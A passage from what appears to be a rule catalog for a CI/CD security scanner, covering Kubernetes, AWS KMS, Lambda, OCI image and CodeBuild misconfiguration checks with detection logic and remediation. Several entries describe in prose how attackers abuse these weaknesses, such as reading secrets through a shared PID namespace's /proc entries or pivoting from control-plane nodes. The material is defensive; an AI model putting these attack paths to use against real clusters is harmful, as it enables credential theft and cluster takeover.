K8S-025: System priority class used outside kube-system HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management, CICD-SEC-5 Insufficient PBAC, CICD-SEC-7 Insecure System Configuration.

How this is detected. The kubelet reserves the two system-* priority classes for its own pods (kube-proxy, CNI agents). Granting them to a user workload also grants the right to preempt and evict anything below 2000000000, which is every non-system pod on the cluster. Outside kube-system this is almost always a misconfiguration copy-pasted from a control-plane manifest.

Recommendation. Reserve system-cluster-critical and system-node-critical priority classes for control-plane workloads in kube-system. Application pods that adopt them gain the right to evict normal workloads under resource pressure, which is a quiet path to a cluster-wide outage if the application has a bug or the attacker has any control over its spec.

Source: K8S-025 in the Kubernetes provider.

K8S-026: LoadBalancer Service has no loadBalancerSourceRanges HIGH

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Internal-only services should use type: ClusterIP (and an Ingress for HTTP) or set the cloud-provider-specific internal-LB annotation. loadBalancerSourceRanges is the Kubernetes-native, cloud-portable way to scope an external LB; cloud-specific firewalls (AWS security groups, GCP firewall rules) are equivalent at the L4 level but invisible to a manifest scanner.

Recommendation. Restrict every Service of type: LoadBalancer with spec.loadBalancerSourceRanges. The default behavior is to provision an internet-facing load balancer that accepts traffic from 0.0.0.0/0, which exposes whatever the Service fronts to the entire internet. A short list of CIDRs scoped to known clients (office IPs, a NAT gateway, peered VPCs) removes the pre-auth attack surface entirely.

Source: K8S-026 in the Kubernetes provider.

K8S-027: Ingress has no TLS configuration MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. An Ingress with no spec.tls (or an empty list) terminates HTTP at the load balancer and proxies plaintext upstream. Ingress controllers will respect ssl-redirect annotations, but those are advisory until tls: is populated. If the Ingress is intentionally HTTP-only (e.g. an ACME challenge endpoint or an internal-only path served behind a network policy), suppress via .pipelinecheckignore with a short rationale rather than leaving it open.

Recommendation. Add a spec.tls block to every Ingress that fronts an HTTP backend. Each entry pairs one or more hostnames with a Secret holding the certificate / key, the canonical pattern is to provision the Secret via cert-manager and a ClusterIssuer pointing at Let's Encrypt or an internal CA. Plaintext-only Ingress lets a network attacker downgrade the connection and read or rewrite request bodies, which matters for any path carrying credentials, session cookies, or PII.

Source: K8S-027 in the Kubernetes provider.

K8S-028: Container declares hostPort MEDIUM 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. hostPort was the pre-Service way to publish a pod's port and survives in legacy manifests. Modern clusters use Services, which integrate with the kube-proxy, ingress controllers, and NetworkPolicies. hostPort is invisible to all of those, a port-scan from any other pod that knows the node IP reaches the workload directly. If a DaemonSet legitimately needs it (host-agent shape), suppress this rule with a brief .pipelinecheckignore rationale rather than leaving it open across the catalog.

Recommendation. Drop hostPort from container ports and use a Service (ClusterIP / NodePort / LoadBalancer) to publish the workload. hostPort binds directly to the node IP, bypasses the cluster's network model, and creates a node-level scheduling constraint that fails replicas with the same port. Workloads that genuinely need node-port binding (some CNI/storage agents) should declare it on a DaemonSet with hostNetwork: true already approved by review.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: K8S-028 in the Kubernetes provider.

K8S-029: RoleBinding grants permissions to the default ServiceAccount HIGH 🔧 fix

Evidences: CICD-SEC-2 Inadequate Identity and Access Management, CICD-SEC-5 Insufficient PBAC.

How this is detected. Fires when a RoleBinding or ClusterRoleBinding lists kind: ServiceAccount, name: default among its subjects. kube-system, kube-public, and kube-node-lease are exempt because control-plane bootstrap manifests legitimately grant the default SA there.

Recommendation. Bind permissions to a dedicated ServiceAccount, not to default. Every pod that omits serviceAccountName runs as the namespace's default SA, so a binding to it grants the same verbs to every untargeted pod in that namespace, including future workloads. Create a purpose-built SA, set automountServiceAccountToken: false on the default, and bind to the new SA explicitly.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Charts that intentionally re-use the default SA in single-tenant namespaces. Consider creating a named SA anyway. It keeps the audit log unambiguous about which workload made an API call.

Source: K8S-029 in the Kubernetes provider.

K8S-030: Workload schedules onto a control-plane node HIGH 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Fires on a non-system workload whose spec.nodeSelector contains a control-plane role label, OR whose spec.tolerations carries an entry with a control-plane taint key. Either condition is sufficient to land the pod on the control plane (the toleration is what survives the node taint; the nodeSelector picks the node).

Recommendation. Drop the nodeSelector and tolerations entries that target node-role.kubernetes.io/control-plane (or the legacy master spelling) from non-system workloads. A pod scheduled on a control-plane node shares the kernel with the API server, etcd, and kubelet credentials, credential theft from any such pod yields cluster-wide takeover. Application workloads belong on dedicated worker nodes; system add-ons that legitimately need control-plane scheduling should run as a DaemonSet in kube-system.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Audit/log shippers and CNI agents in kube-system are exempt by namespace. A workload that legitimately needs to run on the control plane outside kube-system is rare enough to warrant an explicit .pipelinecheckignore rationale.

Source: K8S-030 in the Kubernetes provider.

K8S-031: Namespace missing PSA warn label LOW

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Pod Security Admission supports three modes: enforce (reject), audit (log to API audit), and warn (return a kubectl warning). K8S-023 covers enforce; this rule covers warn. The convention from upstream PSA docs is to set warn to the next-strictest tier above your current enforce so an upgrade from baseline to restricted is a predictable rollout, not a surprise.

Recommendation. Set metadata.labels.pod-security.kubernetes.io/warn on every Namespace, ideally one tier ahead of the enforce label (e.g. enforce: baseline + warn: restricted). The warn level surfaces violations as kubectl apply warnings without rejecting the resource, developers see what would break before an enforcement upgrade lands.

Known false positives.

  • Single-tenant clusters may set warn and audit globally via the AdmissionConfiguration defaults: block instead of per-namespace labels. The label-based check can't see that.

Source: K8S-031 in the Kubernetes provider.

K8S-032: Namespace lacks default-deny NetworkPolicy MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Kubernetes' default network model is allow-everything: without any NetworkPolicy targeting a namespace, every pod can talk to every other pod across every namespace, and every pod can reach the internet. A default-deny policy flips the default to deny, so the only flows that work are those an explicit allow policy permits. The check fires on namespaces declared in the manifest set that have at least one workload but no default-deny NetworkPolicy covering them. Cross-doc correlation: it walks the full manifest stream to match Namespace/workload/NetworkPolicy across files.

Recommendation. Apply a default-deny NetworkPolicy in every namespace that carries workloads. The canonical shape is podSelector: {} (matches every pod) plus policyTypes: [Ingress, Egress] with no ingress: / egress: rules, every flow is denied unless a more permissive NetworkPolicy in the same namespace explicitly allows it. Pair with per-workload allow-list policies for the flows the application actually needs.

Known false positives.

  • Mesh-managed clusters (Istio, Linkerd, Cilium ClusterMesh) often delegate L4 default-deny to the mesh's authorization policy. The check only looks at native NetworkPolicy and won't see that.
  • kube-system / kube-public / kube-node-lease are exempt, control-plane components frequently need open networking and have their own admission-time guards.

Source: K8S-032 in the Kubernetes provider.

K8S-033: Namespace lacks ResourceQuota or LimitRange MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Without a ResourceQuota, a single namespace can consume the cluster's entire scheduling capacity, a fork bomb in a CronJob, a memory leak in a Deployment, or a cryptominer that landed via a fork-PR build can starve every other tenant. Without a LimitRange, individual pods without explicit resources: requests get a default of zero, the scheduler treats them as best-effort and packs them on any node, including ones already at memory pressure. The two work together: quota caps the aggregate, range caps the per-workload baseline. Cross-doc correlation: walks the manifest stream to match Namespace / workload / ResourceQuota / LimitRange across files.

Recommendation. Apply a ResourceQuota and a LimitRange to every namespace that hosts application workloads. ResourceQuota caps the namespace's total CPU / memory / pod / object consumption; LimitRange enforces per-pod request / limit defaults so a workload that forgets to declare its own doesn't get unbounded scheduling. Together they bound the blast radius of a runaway, leaky, or attacker-driven pod explosion to a single namespace.

Source: K8S-033 in the Kubernetes provider.

K8S-034: ServiceAccount automountServiceAccountToken not explicitly false MEDIUM

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. K8S-012 covers the pod-level automountServiceAccountToken setting; this rule covers the same control at the ServiceAccount level. The two are complementary: the SA-level default flips the cluster-wide baseline (true -> false), the pod-level override re-enables only where needed. Without the SA-level disable, every pod that doesn't set its own override mounts a token that can call the K8s API as that SA, a useful credential for an attacker who lands code in any pod, regardless of the workload's own intent.

Recommendation. Set automountServiceAccountToken: false at the ServiceAccount level for every SA that doesn't actively need to call the Kubernetes API. The pods that legitimately do (operators, sidecars that read namespaces, controllers) can opt back in per-pod via spec.automountServiceAccountToken: true. The default is mount-everywhere, which is the wrong direction for least privilege.

Known false positives.

  • Operator / controller workloads (cert-manager, metrics-server, ingress controllers) legitimately need API access from every pod. Their dedicated SAs should keep automount enabled, leave them out of the cluster-wide disable. default SA in every namespace is the high-fire case worth disabling.

Source: K8S-034 in the Kubernetes provider.

K8S-035: Container securityContext.runAsUser is 0 HIGH

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. K8S-007 covers runAsNonRoot: false (the boolean form). This rule covers the explicit numeric form: a container that sets runAsUser: 0 runs as root regardless of runAsNonRoot being declared elsewhere. Kubernetes won't reject the spec, it just runs the container as root. The two rules are paired so neither shape slips through alone. The pod-level securityContext.runAsUser inherits to every container that doesn't override it; this rule fires on the effective UID, walking pod-level first then per-container override.

Recommendation. Set securityContext.runAsUser to a non-zero UID (e.g. 1000 or any application-specific value) on every workload container. The corresponding runAsGroup and fsGroup should also be non-zero. Root inside a container is not isolation, a kernel CVE, a misconfigured mount, or a mis-applied capability collapses straight into the host.

Source: K8S-035 in the Kubernetes provider.

K8S-036: ServiceAccount imagePullSecrets references missing Secret MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Cross-doc correlation: walks every ServiceAccount's imagePullSecrets and confirms the named Secret exists in the same namespace within the manifest set. Misses two cases: secrets created out-of-band (Sealed Secrets, External Secrets, or operator-applied ones) and SAs whose namespace is implicit / not declared in the manifest set. For those, the rule passes, false-negative-friendly.

Recommendation. Create the missing Kind: Secret of type: kubernetes.io/dockerconfigjson (or dockercfg) in the same namespace before applying the ServiceAccount, or fix the imagePullSecrets reference name. A dangling reference doesn't fail apply, kubelet silently falls back to anonymous registry pulls on every image fetch. Workloads either pull a different image than the operator intended or fail at runtime with ImagePullBackOff after the registry rate-limits the unauthenticated client.

Known false positives.

  • Manifests rendered for partial deployment where the secret lives in a parallel manifest set the scanner doesn't see (separate ArgoCD application, Vault-injected, ESO-synced). Add # pipeline-check: ignore K8S-036 or ignore the specific SA name to silence.

Source: K8S-036 in the Kubernetes provider.

K8S-037: ConfigMap data carries a credential-shaped literal HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Companion to K8S-018 (which scans Kind: Secret). Walks ConfigMap data and binaryData for AKIA-shaped AWS keys and credential-shaped key NAMES. Even when the value is a placeholder, having api_key: REPLACE_ME in a ConfigMap is a maintenance footgun, someone will fill it in and commit. RBAC scoping for configmaps is typically much broader than secrets, so any credential leak via this path reaches a wider audience.

Recommendation. Move the value out of the ConfigMap. Secrets belong in Kind: Secret (better: SealedSecrets, ExternalSecrets / ESO, SOPS-encrypted manifests, or HashiCorp Vault Agent injection). ConfigMaps are intended for non-sensitive config and are mounted into pods without the access controls Secrets carry, the RoleBinding for configmaps:get is typically far broader than the one for secrets:get. A credential in a ConfigMap is effectively unprotected once any pod can read the namespace's config.

Known false positives.

  • ConfigMaps that legitimately carry placeholder names (DEBUG_TOKEN_FORMAT, LICENSE_KEY_HEADER) where the VALUE is a format hint rather than a credential. Rename the key to avoid the credential-shaped name.

Source: K8S-037 in the Kubernetes provider.

K8S-038: NetworkPolicy ingress / egress allows all sources or destinations MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. K8S-032 covers the absence of a default-deny NetworkPolicy. This rule covers the inverse: a NetworkPolicy that exists but contains an ingress: rule with no from: (allow from all) or no ports: filter, or an egress: rule with no to: filter. The from: [] / to: [] shorthand is the canonical mistake. A rule that lists specific peers via podSelector / namespaceSelector / ipBlock passes.

Recommendation. Replace the empty from: [] / to: [] rule with an explicit from: [{podSelector: {matchLabels: {…}}}] or from: [{namespaceSelector: {matchLabels: {…}}}] that names the legitimate peer. An empty from / to peers list means every source / destination, every pod in every namespace, plus every external IP. This is indistinguishable from having no NetworkPolicy at all for the targeted pod, but visually appears to enforce a policy (the false-sense-of-security failure mode is worse than no policy).

Known false positives.

  • Policies intentionally allowing world traffic to a public ingress controller pod ({app: nginx-ingress, public: true}). Add # pipeline-check: ignore K8S-038 on the specific NetworkPolicy if the wide-open shape is deliberate.

Source: K8S-038 in the Kubernetes provider.

K8S-039: Pod uses shareProcessNamespace: true MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. shareProcessNamespace: true makes every container in the pod share a single PID namespace. Any container can then enumerate every other container's processes (ps), read their environment variables and CLI args from /proc/<pid>/, send them signals, and (with the right capabilities) ptrace them. A compromised sidecar, debug shell, logging agent, observability exporter, gets a free pivot into every primary container's secrets. The default is false; setting it explicitly to true is the failing shape.

Recommendation. Drop spec.shareProcessNamespace: true from the pod spec. Containers in the pod will go back to having isolated PID namespaces, each sees only its own processes, can't ptrace neighbors, and can't read their /proc/<pid>/environ for env-var-leaked secrets. If the requirement is sidecar-style log collection or process-level cooperation, prefer a sidecar pattern that exchanges data through a shared volume rather than collapsing the namespace.

Known false positives.

  • Debug pods that explicitly need ps / strace across container boundaries, but those are typically ephemeralContainers attached to a running pod, not long-lived pod specs in a manifest. If a permanent workload genuinely requires it, ignore the rule with a documented justification.

Source: K8S-039 in the Kubernetes provider.

K8S-040: Container securityContext.procMount: Unmasked HIGH

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. procMount: Unmasked is rarely needed in practice. It exists for nested-container / KubeVirt scenarios where the container itself runs an inner container runtime that needs to set up its own /proc masking. For an ordinary application container, Unmasked is a runtime-isolation regression that exposes kernel-information paths and writable /proc/sys entries to the workload. Pod Security Standards classify Unmasked as 'restricted'-violating; the rule fires when any container (containers, initContainers, ephemeralContainers) explicitly sets procMount: Unmasked.

Recommendation. Remove securityContext.procMount: Unmasked (or set it explicitly to Default). The default Default procMount type masks several kernel- and node-information paths under /proc (/proc/asound, /proc/acpi, /proc/kcore, /proc/keys, /proc/latency_stats, /proc/timer_list, /proc/timer_stats, /proc/sched_debug, /proc/scsi) and remounts /proc/sys as read-only. These maskings are what stop a container from reading the host's kernel structures or writing to /proc/sys and breaking the kernel out of namespace isolation. Unmasked undoes all of that.

Source: K8S-040 in the Kubernetes provider.

KMS-000: KMS API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: KMS-000 in the AWS provider.

KMS-001: KMS customer-managed key has rotation disabled MEDIUM

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Annual rotation regenerates the underlying key material for the same CMK ARN. Existing ciphertexts can still be decrypted (KMS keeps old material around), but new encrypts use the new material, so a cryptographic exposure (side-channel, an accidental export, an old compromised offline backup) only protects ciphertexts from before the rotation.

Recommendation. Enable annual rotation on every customer-managed KMS key used for CI/CD artifact, log, and secret encryption. Unrotated CMKs keep the same key material indefinitely, so a single cryptographic exposure (side-channel, accidental export) is permanent.

Source: KMS-001 in the AWS provider.

KMS-002: KMS key policy grants wildcard KMS actions HIGH

Evidences: CICD-SEC-2 Inadequate Identity and Access Management.

How this is detected. kms:* on a key policy is administrative authority over the cipher boundary: CancelKeyDeletion, ScheduleKeyDeletion, ReEncrypt, UpdateKeyDescription, and the data-plane decrypt actions all collapse into one grant. A CI/CD principal almost never needs more than the data-plane subset (Decrypt / GenerateDataKey / Encrypt).

Recommendation. Replace kms:* grants with specific actions needed by the caller (e.g. kms:Decrypt, kms:GenerateDataKey). Key-policy wildcard grants let any holder of the principal re-key, schedule deletion, or export material at will.

Source: KMS-002 in the AWS provider.

LMB-000: Lambda API access failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: LMB-000 in the AWS provider.

LMB-001: Lambda function has no code-signing config HIGH

Evidences: CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. Lambda code-signing config + a Signer profile (SIGN-001) validates that an uploaded zip was signed by a known profile before it's allowed to run. Without one, anyone who reaches lambda:UpdateFunctionCode, a CI/CD role compromise, a misattached IAM policy, can replace the function's code with no chain-of-custody check.

Recommendation. Create an AWS Signer profile, reference it from an aws_lambda_code_signing_config with untrusted_artifact_on_deployment = Enforce and attach that config to the function. Without one, the Lambda runtime will execute any code that a principal with lambda:UpdateFunctionCode uploads.

Source: LMB-001 in the AWS provider.

LMB-002: Lambda function URL has AuthType=NONE HIGH

Evidences: CICD-SEC-8 Ungoverned Usage of 3rd-Party Services.

How this is detected. A Lambda function URL with AuthType=NONE is a public HTTPS endpoint. Anyone who knows the URL can invoke. This is sometimes deliberate (a webhook receiver) but the deliberate version typically signs / validates inside the function, the rule fires regardless because the IAM-side control isn't there.

Recommendation. Set the function URL auth_type to AWS_IAM and grant lambda:InvokeFunctionUrl through IAM. NONE exposes the function to the public internet without authentication.

Source: LMB-002 in the AWS provider.

LMB-003: Lambda function env vars may contain plaintext secrets HIGH

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Lambda env vars are world-readable to any principal with lambda:GetFunctionConfiguration, much wider than the principal that can invoke the function. They also persist in CloudFormation drift, change-sets, and CloudTrail events. A secret in a Lambda env var is essentially exposed to anyone with read access to the account.

Recommendation. Move secrets out of Lambda environment variables and into Secrets Manager or SSM Parameter Store. Environment variables are visible to anyone with lambda:GetFunctionConfiguration and persist in CloudTrail events, which keeps the secret in audit logs.

Source: LMB-003 in the AWS provider.

LMB-004: Lambda resource policy allows wildcard principal CRITICAL

Evidences: CICD-SEC-8 Ungoverned Usage of 3rd-Party Services.

How this is detected. A wildcard-principal Allow on a Lambda function resource policy lets anyone invoke. The legitimate case is a service principal (API Gateway, S3 events) where AWS fills in the SourceArn/SourceAccount at invoke time, without those conditions, any account using that service can invoke.

Recommendation. Remove Allow statements with Principal: '*' from every Lambda function resource policy, or scope them with a SourceArn / SourceAccount condition. Service principals (e.g. apigateway.amazonaws.com) are the common legitimate case, ensure they carry a condition.

Source: LMB-004 in the AWS provider.

OCI-001: Image manifest is missing OCI provenance annotations MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Without these two annotations a pulled image can't be traced back to a source revision, so an incident-response team has no way to reach the build that produced it. The rule fires on whichever layer the manifest carries (top-level for an index, sub-manifest for a per-platform image); DF-016 catches the same gap at Dockerfile authoring time, OCI-001 catches it once the image has been built and any later docker buildx --annotation overrides have already been applied.

Recommendation. Stamp the image with at least org.opencontainers.image.source (the URL of the source repo) and org.opencontainers.image.revision (the commit SHA built into the image). With docker buildx this is --label org.opencontainers.image.source=... plus --label org.opencontainers.image.revision=... at build time, or set them as image annotations through --annotation so they appear on the manifest itself (manifest.annotations is what registries surface to manifest inspect).

Known false positives.

  • Throwaway / scratch images that never leave a developer's machine (e.g. image inspect of an intermediate build stage) don't need provenance annotations. Suppress via ignore-file rather than removing the rule.

Source: OCI-001 in the OCI manifest provider.

OCI-002: Image is missing a build attestation manifest HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-9 Improper Artifact Integrity Validation, CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Build attestations are the canonical place for SLSA provenance and SBOM data on an OCI image. A multi-platform image index that ships per-architecture manifests but no attestation-manifest sibling means there's no signed record of how the image was built or what's inside it, so consumers can't enforce SLSA Build-L2+ or feed an SBOM into vulnerability triage. A single-platform manifest (no image index) also fails this rule, attestations require the index-of-manifests shape that BuildKit produces by default.

Recommendation. Build the image with docker buildx build --attest=type=provenance,mode=max --attest=type=sbom (or the equivalent BuildKit frontend flags). Both attestations land as sibling sub-manifests inside the image index, annotated with vnd.docker.reference.type: attestation-manifest and linked to their target manifest via vnd.docker.reference.digest. Verify after pushing with docker buildx imagetools inspect <ref>, the Attestations section should list both predicate types.

Known false positives.

  • Intermediate / cache-only images pushed by CI for later-stage consumption may legitimately ship without attestations to keep build artifacts small. Suppress via ignore-file when this is the deliberate shape, the default expectation for any image that reaches a production registry is a full attestation set.
  • Some registries strip the attestation sub-manifests on pull (docker pull of a single platform unwraps the index). If the JSON you're scanning came from docker manifest inspect rather than docker buildx imagetools inspect --raw, attestations may be invisible even when present upstream.

Source: OCI-002 in the OCI manifest provider.

OCI-003: Image manifest is missing the image.created annotation LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Image age isn't a security boundary on its own, but a missing image.created annotation makes routine triage questions ("is this image stale enough to warrant a rebuild?", "was this image built before or after the CVE-2024-XXXX advisory?") much harder to answer automatically. Surfacing the gap as LOW-severity catches the omission early without overwhelming reports for an otherwise-well-formed image.

Recommendation. Stamp org.opencontainers.image.created with the build timestamp (RFC 3339 / ISO 8601, e.g. 2025-01-30T18:00:00Z). With docker buildx either pass --label org.opencontainers.image.created=$(date -u +%Y-%m-%dT%H:%M:%SZ) at build time, or rely on the BuildKit frontend default which does it automatically when SOURCE_DATE_EPOCH is unset. The annotation lets downstream vuln scanners and registries surface image age, which is the lightest-weight CVE-triage signal available without pulling the config blob.

Known false positives.

  • Reproducible-build pipelines deliberately omit image.created (or pin it to SOURCE_DATE_EPOCH) so the same source produces a byte-identical image. Suppress via ignore-file when reproducibility is the goal.

Source: OCI-003 in the OCI manifest provider.

OCI-004: Image layer references an arbitrary URL (foreign layer) HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. A layer with a urls: field is fetched from whatever URL the manifest declares, not from the registry the image was pulled from. The digest is still verified after the fetch, so a passive attacker can't substitute a different blob, but an attacker who controls the URL endpoint can serve different content depending on the client (server-side cloaking) or simply take the endpoint offline to break image pulls. The rule fires on any layer whose descriptor includes a non-empty urls: array; it doesn't try to validate URL hygiene (HTTPS, allow-list of hosts) since the existence of the field alone is the policy violation.

Recommendation. Rebuild the image without foreign-layer references. The OCI / Docker spec lets a layer descriptor carry a urls: field that tells the client to pull the layer blob from an arbitrary HTTP location at image-pull time, bypassing the registry's content-addressed store. The mechanism exists for proprietary base layers (notably Windows Server base images that ship from mcr.microsoft.com) but is increasingly deprecated, modern Windows images at mcr.microsoft.com/windows/servercore:ltsc2022 no longer use it. If the foreign URL is genuinely required, host the blob inside your own registry and pin it by digest the same as any other layer.

Known false positives.

  • Legacy Windows Server base images (pre-Windows 11 / Server 2022) ship layers from mcr.microsoft.com with this mechanism. Suppress via ignore-file when the Windows image is intentional, the rule has no way to distinguish a Microsoft-blessed URL from any other.

Source: OCI-004 in the OCI manifest provider.

OCI-005: Image manifest is missing the image.licenses annotation LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. Without image.licenses an SBOM tool either has to fall back to scanning the layer contents (slow, best-effort) or simply mark the image as license: unknown in compliance reports. The same field is what container registries surface to the operator UI, so its absence also makes manual license review harder. The rule is LOW severity because a missing license is a hygiene gap rather than a security boundary, but it ratchets up SBOM quality enough that it's worth catching at scan time.

Recommendation. Stamp org.opencontainers.image.licenses with the SPDX expression for the image's contents (e.g. Apache-2.0, MIT AND Apache-2.0, Apache-2.0 WITH LLVM-exception). With docker buildx the simplest path is to add --label org.opencontainers.image.licenses=Apache-2.0 (or, for annotation-based propagation onto the manifest, --annotation manifest:org.opencontainers.image.licenses=Apache-2.0). The OCI image-spec annotation is a well-known SPDX expression carrier, downstream SBOM generators and registry UIs read it directly without needing per-tool configuration.

Known false positives.

  • Internal images that never leave a private registry and aren't subject to OSS license compliance audits may legitimately omit the annotation. Suppress via ignore-file when this is the deliberate stance.
  • Multi-license images with ambiguous coverage (e.g. a base image plus mixed-license app code) sometimes skip the annotation rather than emit a misleading single-license value. In that case, the correct fix is to emit the SPDX compound expression (MIT AND Apache-2.0); suppression is the wrong answer.

Source: OCI-005 in the OCI manifest provider.

OCI-006: Image has an excessive layer count LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Each layer is a content-addressed blob with its own registry round-trip on pull, its own caching decision, and its own potential for credential leakage (a RUN step that touched a secret leaves the secret in that layer's tar archive even if a later layer deletes it). The rule fires above 40 layers, which empirically captures the docker history blowout that happens when a Dockerfile's RUN lines don't collapse (RUN apt-get update followed by RUN apt-get install followed by RUN apt-get clean is three layers where one would do). Indexes don't have layers of their own, the rule passes on them and applies instead to each per-platform image manifest a downstream scan loads.

Recommendation. Squash the image's layer count by collapsing adjacent RUN directives in the Dockerfile (RUN apt-get update && apt-get install ... && rm -rf /var/lib/apt/lists/* is the canonical pattern), ordering COPY lines so cache invalidation moves them as a unit, and using multi-stage builds to drop build-time-only artifacts before the final FROM. BuildKit's --squash flag flattens the result if the Dockerfile shape can't be restructured. Most well-tuned production images sit between 5 and 20 layers; anything past 40 is almost always accidental Dockerfile sprawl, not intentional layering.

Known false positives.

  • Some legitimately large base images (CUDA / ML toolchains, fully-built distros) ship with 30-50 layers by design. Suppress via ignore-file when the layer count reflects a deliberate base-image choice rather than Dockerfile RUN-step sprawl.

Source: OCI-006 in the OCI manifest provider.

OCI-007: Image manifest uses legacy schemaVersion 1 (no content addressing) HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. The OCI image-spec (1.0+) and Docker Distribution v2 both encode schemaVersion: 2 on every manifest. The older Docker v1 format set schemaVersion: 1 and stored the rootfs as a chain of un-addressed tarballs with the chain identity hashed end-to-end at pull time. Anything below 2 is by definition a non-content-addressed manifest. The detection is a strict equality check against schemaVersion.

Recommendation. Rebuild and re-push the image with a current builder (docker buildx build / buildah / ko) so the registry produces a v2 manifest with content-addressed layer descriptors. Docker Distribution v1 manifests predate the digest-pinned design that lets a client verify a pulled blob matches the manifest the registry served, so a v1 pull has no way to detect tampering between the registry and the runtime. Registries have been refusing v1 pushes for years (Docker Hub since 2019, GHCR / quay.io / ECR / Artifact Registry never supported them on read), but a pre-existing v1 image can still be sitting in a private registry; the rule catches it before that image gets promoted.

Known false positives.

  • Some internal Harbor / Nexus deployments still proxy legacy Docker images that haven't been rebuilt; a pull succeeds because the proxy upgrades the manifest at request time, but the on-disk JSON if you saved it with inspect --raw may still report the original schemaVersion. If your registry is doing this in-flight promotion you can suppress; otherwise re-run the build.

Source: OCI-007 in the OCI manifest provider.

OCI-008: Manifest references digest using unsupported hash algorithm HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. The OCI image-spec mandates sha256: or sha512: for content descriptors. sha1: and md5: were never permitted by the spec but show up occasionally in mirror exports and forensic JSON; this rule catches them.

Detection scope: the config descriptor digest, every layer descriptor digest (single-image manifests), and every sub-manifest entry digest in an image index. The matcher accepts sha256: and sha512: as the only valid prefixes; anything else fires.

Recommendation. Rebuild and re-push the image so every descriptor (config, layers, sub-manifest entries) carries a sha256: digest. sha512: is also acceptable per the OCI spec, but anything weaker (md5, sha1) breaks the integrity guarantee the registry pull is supposed to provide. sha1 has had practical collisions since SHAttered (2017); md5 has had them since the early 2000s. A manifest that pins a layer by sha1 lets an attacker who can produce a colliding blob substitute a different tarball without changing the manifest, the registry's content-addressing then ratifies the substitution.

Known false positives.

  • Test fixtures and intentionally-corrupt CTF images sometimes use degraded hashes for pedagogical reasons. Suppress on the specific path with an ignore-file when this is the deliberate shape.

Source: OCI-008 in the OCI manifest provider.

PBAC-000: PBAC enumeration failed INFO

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. See AWS provider documentation for the rule's detection mechanism.

Recommendation. See AWS provider documentation for the recommended remediation.

Source: PBAC-000 in the AWS provider.

PBAC-001: CodeBuild project has no VPC configuration HIGH

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. A CodeBuild project with no VPC configuration runs in AWS-managed network space, egress to the public internet is unrestricted, every package registry / CDN / arbitrary endpoint is reachable. Inside a VPC, security-group + VPC-endpoint policies become the egress gate, which is the only practical way to limit a compromised build's exfiltration paths.

Recommendation. Configure the CodeBuild project to run inside a VPC with appropriate subnets and security groups. Use a NAT gateway or VPC endpoints to control outbound internet access and restrict build nodes to only the network resources they require.

Source: PBAC-001 in the AWS provider.

PBAC-002: CodeBuild service role shared across multiple projects MEDIUM

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. One CodeBuild service role across many projects means a compromise of any project's build environment grants access to whatever resources every other project's build needs. Per-project roles cap the radius, a backdoor in the foo-tests build can't reach the deploy-prod build's secrets if they each have their own role.

Recommendation. Create a dedicated IAM service role for each CodeBuild project, scoped to only the permissions that specific project requires. This limits the blast radius if one project's build is compromised.

Source: PBAC-002 in the AWS provider.

PBAC-003: CodeBuild security group allows 0.0.0.0/0 all-port egress MEDIUM

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. A security-group egress rule of 0.0.0.0/0 on all ports/protocols means a compromised build can connect to any endpoint on the internet, typosquat-package registry, C2 server, attacker-owned dump endpoint. Even when the build is inside a VPC (PBAC-001), this egress rule negates the network-side gating.

